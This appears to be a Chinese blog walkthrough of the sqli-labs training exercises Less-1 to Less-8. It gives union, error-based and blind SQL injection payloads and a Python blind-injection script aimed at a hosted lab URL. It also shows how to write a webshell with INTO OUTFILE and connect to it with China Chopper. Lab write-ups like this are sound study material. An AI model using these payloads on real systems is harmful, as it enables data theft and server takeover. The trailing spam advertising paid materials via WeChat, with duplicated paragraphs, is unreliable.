Less-1 联合注入
当输入?id=1时,显示对应的Login name与Password
①推测闭合方式
输入\,后面是’,应该是单引号闭合
?id=1’报错
?id=1’ --+不报错
说明确实是单引号闭合
②手工查询有多少栏目
?id=1’ order by 2–+
发现3的时候可以,4的时候不可以,说明有3列
③显示报错位
?id=-1’ union select 1,2,3 --+
当union前面的语句为false,才会执行后面语句
发现哪些位置是可以显示的
④爆库名
?id=-1’ union select 1,database(),3 --+
security
⑤爆表名
?id=-1’ union select 1,table_name,3 from information_schema.tables where table_schema=‘security’ limit 3,1 --+
0,1是从第0个开始取,每次取一个
尝试0,1 1,1 2,1 3,1 发现到4,1不行
或者
?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ --+
一次性爆出表名:emails,referers,uagents,users
⑥爆列名
?id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘security’ and table_name=‘users’ --+
爆出列名:id,username,password
⑦爆数据
?id=-1’ union select 1,group_concat(username),group_concat(password) from users --+
或者:?id=-1’ union select 1,group_concat(username,password),3 from users --+
或者:为了格式好看
?id=-1’ union select 1,group_concat(username,0x3a,password,0x3C,0x68,0x72,0x2F,0x3E),3 from users --+
补充:Ascii码的一些转换:ASCII_百度百科
Less-2
同Less-1,没有闭合方式
Less-3
同Less-1,')闭合
Less-4
同Less-1,")闭合
Less-5 报错注入/布尔盲注/时间盲注
这里讲报错注入的方法(报错注入见Less-5,布尔盲注见Less-6,时间盲注见Less-8)
发现它并没有显示位
①判断闭合方式
?id=1\
发现是’闭合
②判断注入点
?id=1’ and 1=1 --+
发现页面无回显
查询语句正确时页面会打印You are in…,错误则不显示
③爆库名
?id=1’ and updatexml(1,concat(0x7e,(database()),0x7e),1) --+
库名:security
②爆表名
?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 3,1),0x7e),1) --+
?id=1’ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1) --+
表名:emails,referers,uagents,users
③爆列名
?id=1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),0x7e),1) --+
列名:id,username,password
④爆数据
?id=1’ and updatexml(1,concat(0x7e,(select group_concat(username,password)from users),0x7e),1) --+
Less-6 报错注入/布尔盲注/时间盲注
布尔型注入:
这个地方进行了数据库查询,但是没有显示位,报错不会出现信息
错误和正确页面有区别
这里讲布尔盲注的方法(报错注入见Less-5,布尔盲注见Less-6,时间盲注见Less-8)
无回显的
①判断闭合方式
?id=1\
发现是"闭合
?id=1" --+成功
②判断数据库长度
?id=1" and length(database())
所以库名长度=8
②判断数据库名中字母
select substr(database(),1,1);
截取数据库库名,从第1个字开始截取,每次截取1个
select ascii(substr(database(),1,1));
截取出来的字,使用ascii码编码
select ascii(substr(database(),1,1)) < 100;
所以
?id=1" and ascii(substr(database(),1,1))>114 --+
?id=1" and (select ascii(substr(database(),1,1))) >114 --+也行
所以ascii码为115,第一位字母为s
用脚本跑
import requests as req
url = ‘http://www.wangehacker.cn/sqli-labs/Less-6/?id=1’
res = ‘’
select = “select database()”
for i in range(1, 100):
for ascii in range(32, 128):
id = ‘1" and ascii(substr(({}),{},1))={}%23’.format(select, i, ascii)
r = req.get(url+id)
print(url+id)
if “You are in” in r.text:
res += chr(ascii)
print(res)
break
if ascii == 127:
print(‘{}’.format(res))
exit(0)
得到库名:security
③走流程
只要修改脚本中的select语句即可
select group_concat(table_name) from information_schema.tables where table_schema=‘security’
select group_concat(column_name) from information_schema.columns where table_schema=‘security’
select group_concat(username,password)from users
Less-7 文件导出
文件导出的方式进行注入
https://www.cnblogs.com/c1047509362/p/12356354.html
①判断闭合
手工测试?id=1’)) and 1=1–+成功
所以是’))闭合
②猜列数
?id=1’)) order by 3–+ 列数为3
③导入一句话木马
?id=-1’)) union select 1,2,‘’ into outfile “C:\ruanjian\phpstudy_pro\WWW\sqli-labs-master\Less-7\test.php” --+
虽然提示报错,但是我们发现已经存在文件test.php了
④连菜刀
中国菜刀进行连接,输入我们写的文件路径,密码是wlw
成功进入
Less-8 布尔盲注/时间盲注
'闭合
这里讲时间盲注(报错注入见Less-5,布尔盲注见Less-6,时间盲注见Less-8)
①判断是否有延时
id=1’ and sleep(5) --+
发现确实有延时,可以用时间盲注
② 爆库长
?id=1’ and if(length(database())=8,sleep(5),null)–+
③爆库名
从左边第一个字母开始,判断库名第一个字母是不是s
?id=1’ and if(left(database(),1)=‘s’,sleep(5),null)–+
?id=1’ and if(left(database(),2)=‘se’,sleep(5),null)–+
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。
学习路线图
其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。
相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。
网络安全工具箱
当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。
项目实战
最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。
项目实战
最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-WH9j2bC2-1712548845389)]
扫一扫
220
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
